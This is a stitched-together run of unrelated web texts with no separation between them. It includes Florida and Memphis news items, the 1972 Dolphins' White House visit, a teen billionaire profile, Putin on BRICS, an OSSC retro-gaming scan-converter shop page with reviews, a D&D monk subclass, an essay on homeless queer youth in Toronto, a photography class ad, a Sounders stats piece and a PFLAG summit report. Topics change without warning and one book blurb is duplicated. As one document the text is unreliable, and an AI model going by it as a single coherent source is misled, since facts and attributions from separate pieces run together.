How To Be Happy SEE GALLERY
Elite .
For more from elite please visit www.elitedaily.com
For more by Elite Daily , click here .
COLLIER COUNTY , Fla. -- Deputies have filed charges against a man that was rescued while nude and acting erratically on the roof of a building under construction Tuesday night .
38-year-old George Fahmy is facing felony charges of criminal mischief , trespass on construction site , and attempted burglary causing damage . He already had an active warrant out of Palm Beach County for a battery charge .
According to a Collier County Sheriff 's Office arrest report , shortly before 8 p.m Tuesday , a resident reported seeing a man acting suspiciously in the area of Immokalee Road near Collier Boulevard .
Arriving deputies found a man , later identified as Fahmy , climbing onto the roof of a Goodwill business under construction , while wearing `` a pair of sneakers and nothing else on his body . ''
Due to his disorientated behavior , fire and helicopter crews were called to the scene to help detain him , and were able to locate Fahmy hiding in an air unit , which was found to be damaged .
Fahmy was safely detained and lowered off the roof and taken for medical treatment . After being medically cleared , he was taken to the Naples Jail Center .
He later told investigators that earlier that evening he was at Pelican Larry 's , where he consumed two drinks , but did n't remember anything after that .
Our Victorian forefathers would have used these terms . It is an archiac term.Made socialy acceptable and stereotypical of Pearly King and Queen types and the lead Dick Van Dyke from the film Mary Poppins and others in the genre . The Cockney accent became a marketable and charming odd ball accent valued by America 's film goers and thereby promoted worldwide.It was cheeky , rough and ready , lower working class and cute especially to American women . I theorise that there were many , many WWII brides from Britain living with their Yank husbands in the USA who themselves promoted such films because they missed the accents and sound of the British working class from whence they came ! Was also a sneer when used in certain tones and timing ! A kind of `` Yes M'Lady ! ! '' in a sneering nature denotes that the servant had had enough of the boss ! ! The staff member would have definately been let go or sacked as a result of said slip ! Also used by male to address a female when said couple are very much in love . `` My heart and soul is yours M'Lady '' My Lady , My woman , My mate , My loverRomantic language , poetic and archaic.Term still used , mostly by songwriters .
MIAMI -- The Miami Dolphins team that achieved the only perfect season in NFL history will be honored by the White House next Tuesday , more than 40 years after its accomplishment .
President Obama will welcome the 1972 Dolphins for the first White House ceremony honoring the only team to finish a season unbeaten at 17-0 . Pro Football Hall of Fame coach Don Shula plans to accompany players from the team to the event .
`` It 's a long time coming , but we 're finally getting there , '' said linebacker Nick Buoniconti , another Hall of Famer .
The '72 Dolphins did n't make it to the White House in the months after their Super Bowl victory , when President Nixon -- a big sports fan -- was immersed in the Watergate scandal .
`` Nixon was too busy calling plays , '' '72 Dolphins running back Mercury Morris said with a laugh . Nixon once suggested a Super Bowl play to Shula .
Dolphins representatives recently raised the idea of honoring the '72 team with the White House .
`` I 'm honored that the accomplishments of the 1972 Dolphins are going to be recognized by the president with a ceremony at the White House , '' Shula said in a statement . `` It is a very special occasion , and I know it 's something that all of us will enjoy and remember . ''
Current Dolphins owner Stephen Ross is paying expenses for the team 's trip . Ross said the entire organization was excited about the invitation .
`` By going undefeated all year en route to a Super Bowl championship , the '72 Dolphins reached the pinnacle of sports achievement and set a standard for excellence that has yet to be duplicated , '' Ross said in a statement . `` In addition , coach Shula and his players were just as successful off the field in their charitable and civic activities , becoming role models for the South Florida community .
`` The players and coaches are most deserving of this unique honor , and they are looking forward to their trip to the White House and their ceremony with the president . ''
While the experience will be new for most of the '72 Dolphins , the White House visit will be Buoniconti 's fourth with four different presidents . He has been invited as a co-founder of the Miami Project to Cure Paralysis . As executive vice president of the NFL Players Association , he visited the White House when Nixon was president .
`` He gave us a couple of hours and gave us a tour , '' Buoniconti said . `` I 'm thrilled to get to go again . ''
Other Hall of Famers on the '72 team were quarterback Bob Griese , receiver Paul Warfield , fullback Larry Csonka , center Jim Langer and guard Larry Little .
`` I guess most of the guys are going , '' Buoniconti said . `` I hear Csonka is trying to come in from Alaska . Knowing Zonk , hopefully he 'll be there . He was such an integral part of that team , and his personality would go well with the president , because he 's whimsical . I 'm sure he 'll have a few things to say to the president . ''
Information from The Associated Press was used in this report .
The video will start in 8 Cancels
Get the biggest daily news stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe , try again later Invalid Email
The world 's youngest billionaire is worth an eye-popping $ 1.2billion , around £862 million .
Alexandra Andresen comes in as one of the richest people on the planet , after inheriting millions from her business-man father Johan Andresen .
The Andresen family own Ferd , a long-running private investment company .
In 2007 , the Norwegian beauty shot to the top spot as the youngest billionaire in the world when her father transferred 42 % of the business to Anexandra .
( Image : Instagram )
Her sister Katharina is just one year older , and received the exact same stake in the business .
Read more : British designer creating fashion for disables people named 'among world 's brightest entrepreneurs '
Born and raised in Oslo in Norway , this year Alexandra made it onto the Forbes World 's Billionaire list .
Alexandra , who recently graduated from high school , is one of Norway 's most successful horseback riders , according to Forbes .
( Image : Instagram )
( Image : Instagram )
She has won medals at numerous European competitions , and currently lives in Germany , where she is sponsored in dressage by Kingsland .
The teenager 's incredible wealth was not widely known until recently , but her family 's wealth goes back generations .
Read more : Subway founder Fred DeLuca dies ages 67 just weeks after sandwich business ' 50th anniversary
Her great-great-great grandfather bought J.L . Tiedemanns tobacco factory in 1849 , which later became the country 's market-leading cigarette maker .
( Image : Instagram )
( Image : Instagram )
In 2005 , the family sold the company for ethical reasons for a huge $ 500million .
They invested the money wisely in real estate , security and hedge funds , according to The Telegraph .
Older sister Katharina , who is the second youngest billionaire on Forbes 's list , is currently a social science freshman at Amsterdam University College in the Netherlands .
Click Below For More Images :
£162.00 price includes VAT
£135.00 price excluding VAT Price : Add Remote ( +£6.65 ) Add remote overlay ( +£4.16 ) Add JP21 adapter ( +£12.00 ) Quantity 1 2 3 4 5 6 Add To Cart
View Cart
OSSCs are in stock but accessories are out of stock ( except JP21 adapters which you can get here ) . Thank you everyone for your support ! More accessories will be re-stocked after our move to Republic of Ireland in March .
Please check the specs below carefully if you intend to order your own replacement PSU .
1.6 Revision – Includes an extra 3.5mm audio input and has analogue to digital conversion as standard , no need for a separate upgrade board . See here for more information .
Important ! – We give you the option to purchase the OSSC without power supply unit ( PSU ) or remote , so that you can use suitable replacements you may already have yourself . Information on using alternative remotes is available here . Please note the specs of the required PSU carefully . You require a unit that outputs DC 5V with at least 1 Amp . The tip must be 2.1 x 5.5mm and centre positive . Please note that damage caused by using an incorrect PSU is not covered under the warranty .
Need a different number of accessories ? Do you want 2 power supplies but only one remote , or a spare remote perhaps ? Leave the boxes above un-checked and add additional power supplies here , remotes here , remote overlays here or JP21 adapters here . For quantities greater than 6 OSSC units please contact us .
Customers in Asia please note – RGB cables are wired slightly differently in your region ( despite having the same physical connectors ) . If you want to use JP21 RGB cables with your OSSC , please also order a JP21 adapter . This adapter is NOT required for the more common Euro SCART cables ( as purchased from Retrogamingcables.co.uk , Retro Console Accessories or most dealers in the EU , Australia and America ) .
It 's finally here ! The ultimate lag-free retro gaming linedoubler and processor hits the market . Now there 's an affordable way to use your retro consoles on your PC monitor or TV in perfect quality . No more bad upscaling , no more interlacing artefacts , no more high input lag , the OSSC is a dream for retro gamers and collectors !
What does it do ?
Processes ( line doubles ) retro games with NO input lag – Unlike other scalers , such as the XRGB Mini , the OSSC works on individual scanlines rather than a frame at a time , that means there 's no input lag whatsoever ( well , a few nanoseconds if you really want to be precise ) .
Eliminates ugly deinterlacing artefacts and bad scaling – Connect most retro consoles to your TV and if you get a picture at all , it 's likely to be ugly . Bad scaling combined with deinterlacing ( which should never even be applied to 240p material ) will ruin the picture and make you wish you had your old CRT back . Well , worry no more ! OSSC converts the image into a 480p or 720p ( where compatible ) image that is correctly displayed and processed . EVERY special effect , from 240p drop shadows to striped sprites , is rendered correctly .
Converts SCART and Component to DVI/HDMI – Feed in a 480p component video signal from a Wii and get out a perfectly processed 480p HDMI or DVI ( with a simple adapter ) image . The quality is flawless !
Convert VGA to DVI/HDMI – Connect a Dreamcast directly to the unit and enjoy HDMI processing of all your games , not just those that support 480p .
Convert analogue audio to digital DVI/HDMI * NEW * – Analogue audio from your retro games console will be converted to digital audio and injected into the HDMI/DVI output ( requires compatible TV , processor or AV receiver . Analogue audio output is still available for setups where this is required ) .
Fast deinterlacer – Fed up with high input lag on interlace games ? The OSSCs deinterlacer is lag free ! Note that this does however mean there 's a drop in picture quality for interlace sources , but this is unavoidable . A pass through mode , where interlace signals are sent directly to the TV for processing instead , is also included .
For more information , click here .
What are other people saying ?
Do n't take our word for it , check out these other reviews around the web .
OSSC – Fudoh 's review
OSSC – Review by Blizz
The Open Source Scan Converter Is Every Retro Gamer 's Dream Come True ( Nintendo Life )
Documentation , support and returns
Firmware updates
Support Forum
Quick start guide
OSSC Wiki
In addition to the standard 1 year EU warranty , we 're also giving a one-month no quibble return for all units . Test the OSSC in your setup and if it does n't work , return it to us for a full refund . All we ask is that you pay return postage and send the complete unit with packaging and any accessories undamaged . Contact us here if you need to return a unit .
Technical specs
Inputs
1 X SCART – Supports RGBs ( clean csync , cvideo sync , luma sync ) , RGsB , Ypbpr
1 X Component video – Supports Ypbpr and RGsB signals
1 X D-SUB15 ( VGA ) – Supports RGBHV , RGBs , RGsB , Ypbpr
2 x 3.5mm analogue audio – Supports all analogue audio . Input 1 can be toggled between output ( from AV1/SCART ) or input
Composite video and S-Video are NOT supported and require an adapter/transcoder
Outputs
1 X HDMI or DVI-D ( with adapter ) ( digital only , including audio ) . Full-range 24-bit RGB output through DVI/HDMI
1 X Analogue audio 3.5mm ( input/output toggle )
Supported input resolutions
240p/288p/480i/576i 15khz
25Khz medium-res modes
480p/576p/720p/1080i 31khz
Supported output resolutions
240p/288p - > 480p/576p or 720p line triple ( compatible displays only )
240p/288p - > 1280×960 , 1280×1152 , 1080p , 1600×1200 line quadruple/quintuple ( compatible displays only )
25Khz medium-res modes - > 480p
480i/576i - > 480p/576p or pass-through
480p - > pass-through or 960p line-double ( compatible displays only )
all other 31khz resolutions passed through
Other features
Back lit LCD
SD Card socket for firmware updates
JTAG connector
IR receiver
Power requirements
DC 5V 1 Amp – 2.1 x 5.5mm positive tip
Customer Reviews
Submit your review 1 2 3 4 5 Check this box to confirm you are human . Submit Cancel Create your own review Open Source Scan Converter ( OSSC ) Average rating : 26 reviews by Andrew G. on Open Source Scan Converter ( OSSC ) Comparing to a Sony PVM I do n't own any other Upscaler like the Framemeister , but I do own a 14 inch Sony PVM Monitor in great condition that I 've used for retro gaming for a while now . I 've been interested in the OSSC as a solution to playing my old consoles on my 55 '' LG OLED .
I 'm so impressed with the OSSC I 've decided to clean up and put away my Sony PVM and consolidated my consoles under my LG OLED with the OSSC . It 's really that good .
My biggest hurdle with the device was getting used to the interlaced PS2 games on the giant OLED screen ... the small PVM does a lot to hide the blemishes of the PS2s interlaced rendering . Comparing the PS2 on a smaller LCD IPS Monitor with the OSSC to the Sony PVM , I found the picture quality to be extremely close and very sharp in both cases ... It 's only after blowing up to 55 '' OLED the issues become noticeable when sitting a few feet away from the TV . It helped a lot to dial in the timing parameters and adjust the LPF to sharpen the pixels on 480i PS2 games .... then applying the `` alternating '' scanlines , which mimic the look of an interlaced image very well .
PS1 , 240p games , and Sega Genesis are pretty much flawless ... Love the hybrid scanlines and the 1080p 5x line multiplier , which looks beautiful filling up the screen .
Input lag on the OLED through the OSSC is also pretty much indistinguishable compared to the CRT . There might be a tiny , tiny noticeable difference ... ( OLED adds about 21ms input lag according to Rtings ) but it 's within the margin of error that I 'm not really sure if it 's just in my head .
Lastly , the consistent support and features this device has been getting and continues to receive thanks to the amazing developers really nails it .
If you guys ever have a 4k hardware revision , I 'll gladly upgrade and buy again ! by Andrew on Open Source Scan Converter ( OSSC ) Excellent device I 've had a Framemeister for several years and was hesitant to get an OSSC . Now that I have the OSSC , I 'm really happy with it . I think I prefer it to the Framemeister in every situation . 240p on line4x looks amazing , especially with scanlines and 480p looks great with line2x ( and I actually like scanlines with that too , surprisingly ) . I was most curious about the 480i options . While I may be alone in this , I absolutely love the way 480i line4x with bob deinterlace looks . The Framemeister 's 480i has a lot of noise in it and other artifacts that I do n't care for . The flicker effect is very reminiscent of a CRT and preserves the intended look , in my opinion . The OSSC 's color handling is also amazing . Setting up the OSSC was a piece of cake and required minimal tweaking to get an awesome picture . Since compatibility is an issue for the OSSC , I got a TCL 49S405 for dirt cheap , and it has not turned down any signal the OSSC has sent it .
If you have a Framemeister , you do n't need this , but it 's fun to have . If you do n't have a Framemeister , then I think most people would be happier with this . by James F on Open Source Scan Converter ( OSSC ) OSSC Rocks ! Ordered from Aus - fast delivery and good packaging - thing works so well i nearly fell off my couch . combined with a good quality cable you can not go wrong . Thanks ! !
Tested on Sega Megadrive 1 and Master system 1 through RGB SCART . have not tested other functions but the remote is worth buying just for the options . by Ben on Open Source Scan Converter ( OSSC ) Old School Meets New School Woah . I was a bit skeptical about being able to hook up my SNES to a UHD monitor , but it works . so . damn . well ! Seriously blown away by the quality and especially the complete lack of lag compared to my last setup .
For reference ( for the googlers ) . I have a 1chip-01 SNES , SCART SNES cable , an LG 32UD59-B monitor , and I use an Elgato 4k60 Pro . Everything runs smooth and streaming with it works flawlessly . by Alan on Open Source Scan Converter ( OSSC ) Having used a Scart/VGA/Hdmi and scanline generator and the output was ok , but it lost it 's RGB colour , I decided to go for the Ossc , the best decision ever , it stays RGB and the options are great , updating the firmware was easy after watching the video . Buying from here is easy and convenient .. ? by AndreTrek on Open Source Scan Converter ( OSSC ) A Worthy Investment I 've had my OSSC since December of last year and it 's been an absolute blast . All output modes work perfectly on my BenQ RL2455HM monitor and the image quality for both my Saturn and PS2 ( when using progressive video modes ) is absolutely pristine .
My only real complaint is the lack of a more sophisticated deinterlacing method , as the flickering caused by bob deinterlacing can be quite distracting . I 'd definitely be willing to buy another unit if they ever make a new revision with hardware capable of utilizing better deinterlacing solutions . by Ram Dobson on Open Source Scan Converter ( OSSC ) Link to the past looks great The conversion looks great ( my snes looked like butt with the standard converters ) . More importantly they STAND BY THEIR PRODUCT . My first unit was defective and they shipped me a new one promptly after receiving the defective unit . Appreciated the quick communication , and prompt shipping . by Daniel on Open Source Scan Converter ( OSSC ) New Wave Of Retro Gaming ! I 've been using the OSSC for about a year now and could n't be happier ! After some twiddling with the many options of the OSSC and a few adjustments to my TV 's settings ( which by default did n't give the optimal picture for any of my applications , including my PC and disabled all the optimizations ) , my Japanese Mega Drive output looks better than ever ( also thanks to a good RGB SCART cable ) . Thanks to a vivid picture with nice colors and blacks and of course the scanlines , give a classic arcade-like experience on my 4K TV , which is great . Recommended ! by Sergey on Open Source Scan Converter ( OSSC ) OSSC - the best of the best ! Finally , I got the best picture for Playstation 2 !
XRGB-mini Framemeister could not do this ! Thanks Sergey ! While we 're glad you love the OSSC , for the PS2 the XRGB-mini is usually the better choice , since the OSSC does not have sophisticated deinterlacing and most PS2 games run in 480i . by Sadid on Open Source Scan Converter ( OSSC ) OSSC Works great with a little cheap magnovox tv , ( 19mf1377b usa model ) actually works with snes on all resolutions . Doesnt work with my 75xbr900e 4k with snes but works with the sega genesis ( megadrive ) . However the snes works with tv if im connected thru my av receiver marantz sr6010 . I am extremely happy and it is a big upgrade over the cheap scart to hdmi converter . Page 1 of 3 : « ‹ 1 2 3 › » WP Customer Reviews Powered by
If your country is not listed as a shipping destination please contact me , I may be able to sort something out for you !
Transactions made in our store are 100 % safe , SSL encrypted and guaranteed by our payment provider Stripe . Please use a modern browser to shop on our site , we do not support Internet Explorer 9 or earlier and may cancel transactions placed with those browsers .
Please dispose of your unwanted electrical items responsibly and for free at your local recycling centre . See our page here for more information .
Way of the Unbroken Circle
The Githzerai monks of the Unbroken Circle have a methodology emphasizes mind over matter in the most literal sense . Using their Ki as an energy source , they manifest specialized psychic powers that can affect their both their opponents physical and mental states as well as bypass magical restrictions . To these mental masters , enlightenment is just a circle that does not break , even if they have to will that it stays together themselves .
While Gith are naturally gifted in the practice of such psionic power , It 's not extremely uncommon to find someone of another race with the potential to develop it . The real challenge is in finding a teacher , as the vast majority of these monks eternally test their will on the plane of Limbo . Practitioners of the the Way of the Unbroken Circle are all too willing to share their knowledge , but their numbers can not flourish because there are very few with the combination of physical talent , mental discipline , and psionic potential that is needed to master the powers that lie within .
“ Once one truly knows oneself , they can see the truth in all things. ” -- The Unbroken Circle of Zerthimon
Mind 's Eye Techniques
At 3rd level , you gain the ability to activate your latent psionic potential in a variety of ways .
Psychic Assault
Whenever you hit with an unarmed strike you may elect to deal Psychic damage instead of its normal damage type .
Telekinetic Strike
At any time , you may spend 1 Ki point to give your unarmed strike and monk weapon attacks Reach until the start of your next turn . A hit with such an attack does Force damage instead of its normal damage type .
Mental Prowess
You may choose to use your Intelligence modifier instead of your Wisdom modifier for Unarmored Defense and any ability that uses your monk saving throw DC .
Additionally , you can use your reaction to gain resistance to Psychic damage until the start of your next turn .
Force of Will
At 6th level , you have gain the ability to better impose your will on the world around you . As a reaction , you may spend 2 Ki points to cast feather fall or shield . You may also cast jump at will , but must concentrate on it for the duration .
Arena of the Mind
At 11th level , you learn to take combat into your opponent 's psyche by using your superior mental discipline . As an action , you may spend 5 Ki points to cast phantasmal killer as a 4th level spell or 3 Ki points to cast phantasmal force .
Brain Drain
At 17th level , you master a technique that can completely shatter the fragile little minds of your foes . You may spend 3 ki points cast the feeblemind spell once per short rest .
Walking the Worlds
At 18th level , your mastery of matter allows you to physically transport yourself and others to other planes of existence at the cost of the spiritual connection required to astrally project . The Empty Body feature does not give you the ability to cast astral projection , you instead gain the ability to spend 8 ki points to cast plane shift .
ON SALE FOR A LIMITED TIME !
This is the tale of a child who falls into a deep hole and discovers a whole new magical world full of wonders and danger . She has lost all memory of who she is , and what happened to her . With only her wits and some cryptic information from a kindly monster named Toriel the child must find a way to get back to her world and remember who she is real
ON SALE FOR A LIMITED TIME !
This is the tale of a child who falls into a deep hole and discovers a whole new magical world full of wonders and danger . She has lost all memory of who she is , and what happened to her . With only her wits and some cryptic information from a kindly monster named Toriel the child must find a way to get back to her world and remember who she really is .
* * * Read It Frees With Kindle Unlimited Or Prime Membership ! Do n't have a Kindle device ? No worries ! Read it on your PC , Mac , Tablet Or Smartphone ! * * *
Putin says BRICS is ready to `` overcome the excessive domination of the limited number of reserve currencies ''
Russia is ready to join forces with its partners to counter excessive domination ' of the limited number of reserve currencies , Russian President Vladimir Putin said in his article in the run-up of the BRICS summit published on Friday .
`` We are ready to work together with our partners to promote international financial regulation reforms and to overcome the excessive domination of the limited number of reserve currencies . We will also work towards a more balanced distribution of quotas and voting shares within the IMF and the World Bank , '' Putin said in his article , headlined `` BRICS : Towards New Horizons of Strategic Partnership , '' to be published by the leading media of the BRICS states ( Brazil , Russia , India , China and South Africa ) ahead of the group 's summit due on September 3-5 in China .
Unfairness of global financial architecture
According to the Russian leader , Russia shares the BRICS countries ' concerns over the unfairness of the global financial and economic architecture , which does not give due regard to the growing weight of the emerging economies .
`` I am confident that the BRICS countries will continue to act in a consolidated manner against protectionism and new barriers in global trade , '' he said . `` We value the BRICS countries ' consensus on this issue , which allows us to more consistently advocate the foundations of an open , equal and mutually beneficial multilateral trade system and to strengthen the role of the WTO as the key regulator in international trade . ''
The president said that Russia 's initiative on the development of cooperation among the BRICS countries ' antimonopoly agencies is aimed at creating effective mechanisms to encourage healthy competition .
`` The goal is to create a package of cooperation measures to work against the restrictive business practices of large multinational corporations and trans-border violations of competition rules , '' he said .
Role of New Development Bank
The Russian leader said that a BRICS Strategy for Economic Partnership , which is currently being successfully implemented , was adopted at the summit in the Russian city of Ufa in 2015 .
`` We hope to be able to discuss new large-scale cooperation tasks in trade and investment and industrial cooperation at the Xiamen Summit , '' Putin said .
He added that Russia is interested in promoting economic cooperation within the BRICS format .
`` Considerable practical achievements have been recently reported in this area , primarily the launch of the New Development Bank ( NDB ) . It has approved seven investment projects in the BRICS countries worth around $ 1.5 billion , '' Putin said .
`` This year , the NDB is to approve a second package of investment projects worth $ 2.5- $ 3 billion in total , '' the Russian leader continued . `` I am convinced that their implementation will not only be a boost to our economies but will also promote integration between our countries . `` .
Source : TASS
Feb. 14 ( UPI ) -- A Tennessee funeral home is drawing in bereaved customers by offering an unusual service -- drive-through viewings .
Ryan Bernard , who opened the R. Bernard funeral home in Memphis with his family at the end of January , said the service is designed to be more convenient for families who are already facing the burden of losing a loved one .
`` I got the idea from a funeral home out in California , '' Bernard told WHBQ-TV . `` I thought it was something new . I thought it would be neat to add to the Memphis area . Just to add something unique to our funeral home . ''
Bernard said the drive-through viewings are offered for no extra charge to families who purchase a funeral package .
`` Say a family has a visitation from 4 to 6 . We would put their loved one in the drive-thru viewing area say around 1 o'clock and they will have a drive-thru viewing from 1 to 2:30 , '' Bernard told WATN-TV .
He said four families have used the drive-through option so far , and all of the feedback has been positive .
`` We 've been getting rave reviews . We 've had people actually just pull up drive-thru just had a curiosity they did n't even know the person who passed , '' he said .
Bernard said guests pull up to a window , where they sign in on an iPad and then receive up to three minutes of viewing time .
`` Some people , they do n't want to deal with the hassle , the chaos of a large funeral ; parking , especially with inclement weather , so that was an extra convenience for those , '' Bernard said .
`` You 'll be surprised how many people who just ca n't stomach coming into a funeral home . They 're scared so it offers convenience to those , '' Bernard said .
BY : GARY SEWARD
It 's a humid summer night and the street is littered with the day 's newspapers , Starbucks cups , trash and all things discarded . The gleams from the streetlight strike the damp concrete creating an amber glow in the dusk . The street is empty and quiet and for Riley it 's a fleeting getaway from the everyday hustle . During the day this stretch of King Street from Dovercourt down to Dufferin is teeming with life , but tonight it 's a safe place for Riley to walk and find a new place to sleep . His old squatting place under the bridge along the Don Valley was recently taken over by some other street kids or “ gutter rats ” as Riley would describe them .
Being homeless in Toronto is not an easy deal . The violence , substance abuse , constant harassment from the police and general public make it very hard to live on the streets with a relaxed mind . For the countless homeless queer youth the dangers of homelessness are even further amplified .
Riley was 17 when he was kicked out of his house by his domineering father for discovering Riley was gay . After being kicked out he did what many youths do and he fled to the metropolis of Toronto from his suburban home in Oshawa .
“ I ca n't really stay in any shelters because the violence toward anyone perceived as being gay is extreme . And the only place [ Eva 's Phoenix ] some can turn to is always full and has a long waitlist. ” –Riley *
Most nights Riley , along with many homeless youth , spend a lot of time looking for places to squat or couches to surf . Some nights , though , they are left to wander the streets until daybreak and they can either start a grueling new day of panhandling or squeegeeing – or finally pass out in a park .
Like many homeless individuals , Riley spends a good portion of his day panhandling on the streets , in particular the stretch of Queen St. from Bay over to Bathurst . On typical day Riley pulls in around $ 60 , mostly in change . He 's made a career out of annoying Bay Streeters and tourists who toss change in hopes of not making eye contact .
“ Most days I can make around $ 50- $ 60 from just begging , but that 's a full day not just a few hours . I used to squeegee a lot with some kids I knew . But it 's really dangerous . I have had my feet run over quite a few times and the cops target us hard when we do it . But when I was squeegeeing I was making more than $ 100 a day . ”
With no ID , Riley is having a hard time applying for Social Assistance and finding there are quite a few barriers to get onto Ontario Works . Contrary to the unsympathetic response of “ why do n't the homeless just get a job like the rest of us ? ” , without Ontario Works there is virtually no way someone homeless can become employed . That coupled with the prospect that Toronto apartments are not rent controlled , Riley is not optimistic for his future .
“ I totally fucking gave up on thinking I would get out of this . It 's a cycle . It 's really awful . This is a great city for people who have money and a purpose but I am just a throwaway . I do n't belong . I am just waiting for the day when there 's pest control for people like me . ”
I spent the afternoon one-day with Riley on Queen and Spadina where other homeless , vulnerable people hang out and was shocked to discover other people who had been living on the streets of Toronto for years , even in one case over a decade . I stood in front of the McDonald 's listening to story after story of gay men or trans people being viscously attacked in shelters and shelter staff turning blind eyes to the abuse . One particular story stained my mind about a young boy hogtied in a shower and beaten to the point of unconsciousness .
The Government of Canada published very conservative stats that 150,000 youth are homeless in Toronto but that number is believed to be at least double ; with 40 % of the youth population on the streets being queer and from middle class families .
In a July 10th city council vote recommending that the City of Toronto investigate more support systems for homeless LGBTQ youth , Mayor Rob Ford cast a lone vote in opposition . More so than any media crack antics , this made me truly ashamed of Toronto 's leadership .
Riley is n't just some rebellious 19-year-old kid who hates his parents and is lazy . He was thrown away for being gay and is now invisible because of it .
Complacency is cancer . Why are we remaining complacent in having teenagers and young people on the street ? Most people walking down the street in Toronto would look at a decrepit desk or chair sitting on the curbside and see the potential in restoration , but why can we not see the same potential in homeless youth ?
* Name changed for confidentiality purposes *
AFTER THIS CLASS YOU 'LL BE ABLE TO :
Leverage new techniques for choosing the light and locations for a successful portrait
Know how to build a rapport and utilize clear communication with your subjects
Set up a developed concept as well as how to light on the fly
Use successful strategies for marketing yourself as a photographer and how to get your work in front of editors
ABOUT VICTORIA 'S CLASS :
Portraits require more than just great lighting and equipment . Sometimes a shoot does n't go as planned . The location is drab , the client is n't in the best mood , or you forget to charge your camera batteries . Great portrait photography artists are able to think on their feet , connect with their subjects -- and capture great images under pressure . The best portraits often come from portrait sessions that did n't go exactly as planned , when challenges turn into assets .
Celebrity portrait photographer Victoria Will shows you how to use your environment to capture a unique , sharp image that reflects the person in the portrait . She 'll also highlight how to quickly evaluate a less than perfect situation and make it work for you and your subject . Take your portraits from amateur to near Mona Lisa gallery worthy by learning how to shoot portraits under pressure .
You 'll watch Victoria photograph real people in limited settings , discovering multiple opportunities in a limited space . Learn her three portrait musts for preparation , point-of-view , and connection . Gain insight into how to make every frame count and how to get the shots the editor requested , as well as those that speak to your vision . Learn how to make your subject feel comfortable in only a few moments while capturing exquisite photo collections in Portraits Under Pressure .
WHO THIS CLASS IS FOR :
The photographer looking to improve their portraiture through thoughtful lighting , creative techniques and leveraging the environment around you to get a consistent appearance .
ABOUT YOUR INSTRUCTOR :
Victoria Will 's background as an American photojournalist and celebrity photographer has helped her to develop techniques on editorial assignments to quickly connect with a subject . Her career began as a photojournalist for the New York Post and grew into a sharp portrait photography focus that opened opportunities to photograph celebrities . She continues to work in New York as an artist specializing in portraits and commercial work .
Marc Burch has come a long way with the Seattle Sounders . In 2012 , he started 19 regular season games due to a mix of injury , unavailability , and form on the part of Leo Gonzalez . On several occasions , Sigi Schmidt inaugurated the double-LB look with a later substitution to protect a lead , and often Leo played the more advanced position . Gonzalez reclaimed the starting spot by the end of the season . Turn the clock to 2013 , and a mix of health , availability , and form has limited Burch to two regular season starts at LB , both in March .
Burch debuted at left midfield in the 1-0 loss at San Jose on July 13th , most notable for the Sounders ' loss of three players due to injury ( Michael Gspurning , Brad Evans , Djimi Traore ) by the 53rd minute compounding the forced absence of Obafemi Martins . Extenuating circumstances aside , it was n't a promising beginning . Burch generated 1 key pass and launched 1 off target shot of his own ; he completed 1 of 5 crosses , and a very weak 20/31 basic passes . 11 defensive actions ( 9 of them , recoveries ) rated fairly well for the Sounders midfield , but his 18 lost possessions were not encouraging . However , with international absences and injuries influencing selection , Burch kept accumulating midfield minutes , and the huge win against Real Salt Lake on the 13th marked his 7th start in that position . How have things changed ( and , indeed , have they ? ) .
The concerns of sample size and a noisy graph notwithstanding - those who have praised Burch 's recent efforts in midfield may be justified . His accuracy - both in crosses and in basic passes - has improved , and he has ( correspondingly ) turned the ball over less . In the seven starts , he 's built up 3 assists ( vs. 2 in his 21 Sounder starts at LB ) . Per 90 minutes , he generates shots ( his own or others ' ) about 2.17 times , better than Evans but weaker then Neagle in comparable roles . Where , exactly , does Burch fit in context with other LMs ?
This graph is not fully updated for Mauro Rosales or Lamar Neagle just yet , but you can get a feel for Burch 's role nonetheless . For one thing , he has not simply translated his play from LB into a midfield role ( or , at least , has n't since his first couple games ) . His defensive stats are roughly halved from his last 4 starts at fullback ( 17.5 per 90 ' to 8.3 ) . His rate of play and involvement is remarkably similar to that of Rosales ... and that is a trend to keep an eye on as Seattle picks out the XI on the field . Marc Burch has proven capable , in recent games , of delivering dangerous service from outside the box . He has the experience for solid defense , and has cleaned up his simple passing game to eliminate some dangerous turnovers . However , against high-pressure/possession opposing midfields ( e.g . Houston ) , when the Sounders need two defensively-minded players in that space , he may not be the best choice .
Since 2008 I have been creating “ Typecats ” . Each cat has its own specific characteristics , triggering emotions with a large dose of humor . When I first started , it was the shape of a particular plastic bottle that inspired me to use it as a feline body . This resulted in prototype “ Alice ” , a prima ballerina in my granddaughters favorite color .
Over the years , many more personalities have sprouted from my imagination . Each Typecat has a unique personality , expressed in every detail of its style , clothing and accessories and placed on a matching foot or box to complete the story . Some represent characters from books or movies , others are based on ( in ) famous people or stereotypes .
If you want to order a typecat or want one made specifically for you , please send me a message or email me at doetieart @ gmail.com .
Overview | Photos | Video | Materials
Summer Summit Success !
Our Gainesville PFLAG chapter hosted our very first Summer Summit this past August 17th on the topic of Homeless LGBTQ ( lesbian , gay , bisexual , transgendered , or queer/questioning ) Youth . Summit organizers Bill Hutchinson and Steve Waybright worked with PFLAG , local residents , and organizations in Gainesville and North Florida to bring together people who are connected with and interested in helping LGBTQ youth who struggle with the ramifications of homelessness . Concerned citizens and PFLAG members , Jim & Mary Freeman , felt that the event was a step in the right direction : `` We are excited about working with everyone in planning the action PFLAG can take based on the feedback and suggestions . It was amazing ! The networking was so positive . ''
The aim of the summit was to raise awareness about the LGBTQ portion of the homeless population in Gainesville , who often face a greater amount of discrimination and violence than other non-LGBTQ homeless youth . `` We want to bring the issue to light and start a discussion about what we are doing , what we are not doing , and what we can do better , '' Hutchinson said ( 1 ) . In a follow-up comment , CDC Family and Behavioral Health Services representative Radha Selvester stated , `` We 've also discovered that we are NOT capturing accurate data on LGBTQ youth participants [ entering the youth shelter ] . We are exploring ways to do this better . ''
`` The Summit was both informative and inclusive ... Something that I appreciated most about this event was that people ( myself included ) felt heard , and that people who came in knowing next to nothing about LGBTQ terminology and LGBTQI Youth Homelessness left with knowledge that they previously lacked , '' stated Summit collaborator Olivia DeMonte . DeMonte works with Health Street , a community-based effort to assess the medical and social services needs of Alachua County residents as well as to present opportunities for them to participate in research studies . She worked closely with Hutchinson and Waybright in generating statistics and identifying specific barriers to understanding where resources are needed .
